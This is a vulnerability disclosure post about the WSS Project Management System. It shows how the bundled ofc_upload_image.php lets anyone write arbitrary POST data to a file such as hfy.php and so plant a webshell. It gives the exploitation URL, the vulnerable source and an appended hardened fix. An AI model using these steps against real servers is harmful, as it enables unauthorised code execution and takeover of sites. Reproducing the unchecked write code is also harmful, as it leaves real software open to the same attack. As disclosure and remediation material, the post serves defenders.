Title: WSS Project Management System POST get shell
Author: admin  Time: 2013-2-23 12:38

POST data vulnerability: the vulnerable file writes the raw POST body to a file whose name, extension included, is taken straight from the request, so a file with any suffix can be saved.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php  (hfy.php is the file name that gets written)
POST arbitrary data in the request body.
Saved location: http://localhost/chart/tmp-upload-images/hfy.php
Even the latest WSS release ships this vulnerable file, the paid edition included, and so does the demo deployed on the Sina app store.

<?php
//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*
print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// NOTE: basename() only strips directory components; the extension supplied
// in ?name= is kept as-is, and no session or permission check precedes this.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();

//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}
?>
Fix:
This vulnerable file is a mess. How to fix it: add permission checks, extension validation and the like; sort it out yourself.
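One way to apply the fix the post calls for, as an added example (not code from the original post or from Open Flash Chart): a hardened replacement for the raw-POST write path that enforces a permission check, an extension whitelist, a server-generated file name and a byte-level image check. The current_user_can_upload() hook and the 'user_id' session key are assumptions about the host application, which must wire in its own authorization.

```php
<?php
// Added example, not code from the original post or from Open Flash Chart:
// a hardened replacement for the raw-POST write path of ofc_upload_image.php.
// current_user_can_upload() and the 'user_id' session key are assumptions
// about the host application, which must supply its own permission check.
const UPLOAD_DIR  = __DIR__ . '/../tmp-upload-images/';
const ALLOWED_EXT = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg'];
const MAX_BYTES   = 2 * 1024 * 1024;

function current_user_can_upload(): bool {
    // Hypothetical hook into the application's session; OFC has no check at all.
    return isset($_SESSION['user_id']);
}

function safe_destination(string $requested): ?string {
    // basename() only strips directories; "hfy.php" keeps its .php suffix.
    // Whitelist the extension and generate the stored name server-side.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_EXT)) {
        return null;
    }
    return UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $ext;
}

function body_is_image(string $body, string $ext): bool {
    // Validate the bytes, not the name: a PHP script posted as "x.png" fails here.
    $info = @getimagesizefromstring($body);
    return $info !== false && $info['mime'] === ALLOWED_EXT[$ext];
}

session_start();
if (!current_user_can_upload()) {
    http_response_code(403);
    exit('forbidden');
}
// $HTTP_RAW_POST_DATA was removed in PHP 7; php://input is the supported source.
$body = file_get_contents('php://input');
$destination = safe_destination($_GET['name'] ?? '');
if ($body === false || strlen($body) > MAX_BYTES || $destination === null
    || !body_is_image($body, pathinfo($destination, PATHINFO_EXTENSION))) {
    http_response_code(400);
    exit('only png/jpeg image bodies up to 2 MB are accepted');
}

// 0755, not 0777; also serve this directory with script execution disabled.
if (!is_dir(UPLOAD_DIR)) {
    mkdir(UPLOAD_DIR, 0755, true);
}
file_put_contents($destination, $body, LOCK_EX);
echo 'Saved ' . basename($destination);
```

Pair this with a web-server rule that refuses to execute scripts under tmp-upload-images/, so that a validation bypass still cannot yield code execution.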